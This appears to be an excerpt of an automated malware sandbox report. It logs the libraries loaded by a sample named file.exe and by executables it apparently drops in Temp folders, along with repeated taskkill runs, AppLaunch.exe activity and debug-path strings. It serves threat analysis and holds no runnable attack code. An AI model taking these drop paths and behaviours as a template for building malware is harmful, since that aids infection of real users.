Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: file.exe Static file information: File size 1930752 > 1048576
Source: file.exe Static PE information: Raw size of egarwnqv is bigger than: 0x100000 < 0x1a5a00
Source: Binary string: webauthn.pdb source: firefox.exe, 0000001C.00000003.2801056711.000001DEEBF8E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\applaunch.pdb@ source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\applaunch.pdb]q03f5 source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: SxQyhJr.exe, 00000007.00000002.2452771154.0000000006350000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbL source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: SxQyhJr.exe, 00000007.00000002.2452771154.0000000006350000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Windows\applaunch.pdbpdbnch.pdbdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
